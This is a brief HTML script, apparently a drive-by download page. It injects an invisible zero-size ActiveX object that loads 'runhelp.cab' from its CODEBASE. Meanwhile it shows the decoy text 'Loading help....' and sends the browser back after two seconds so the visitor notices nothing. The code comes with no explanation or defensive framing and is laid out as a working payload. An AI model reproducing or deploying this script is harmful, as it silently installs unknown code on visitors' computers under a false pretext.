<script>
    objectstr="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""
    objectstr+="CODEBASE=\"runhelp.cab#version=1,1,1,1\">"
    objectstr+="<PARAM NAME=\"_Version\" VALUE=\"65536\">"
    objectstr+="</OBJECT>"
    objectstr+="<HTML><H1>Loading help....</H1></HTML>";
    objectstr+="\<SCRIPT>setTimeout('gob()',2000);function gob(){history.go(-1)}<\/SCRIPT>"
    

    document.open();
    document.clear();
    document.writeln(objectstr);
    document.close();

</script>
